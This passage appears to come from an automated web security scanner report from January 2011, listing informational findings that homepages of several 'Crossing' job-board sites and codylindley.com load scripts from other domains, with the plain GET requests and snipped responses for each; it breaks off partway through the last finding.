<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.302. http://www.chefcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chefcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.303. http://www.civilengineeringcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.civilengineeringcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.304. http://www.clevelcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clevelcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.305. http://www.clinicalresearchcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clinicalresearchcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.306. http://www.codylindley.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.codylindley.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET / HTTP/1.1
Host: www.codylindley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:57 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 7535

<!DOCTYPE html>
<html>
<head>
<link href="/screen.css" rel="stylesheet" media="all" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="author" content="Cody Lindley
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

15.307. http://www.compliancecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.compliancecrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.308. http://www.computeraideddesigncrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.computeraideddesigncrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.computeraideddesigncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:21 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i4i09jl3sjo0digpp5qe6oqa75; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121001

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.309. http://www.constructioncrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.constructioncrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.constructioncrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6c5ho2kr4aaj7if0r37e83a520; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 131637

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.310. http://www.consultingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.consultingcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.consultingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cd981ht9vh5kim10q4v8a0ih67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111912

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

<SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.311. http://www.contractmanagementcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.contractmanagementcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.contractmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:33 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fsi5mhj5680mc16iu88s1m9v73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
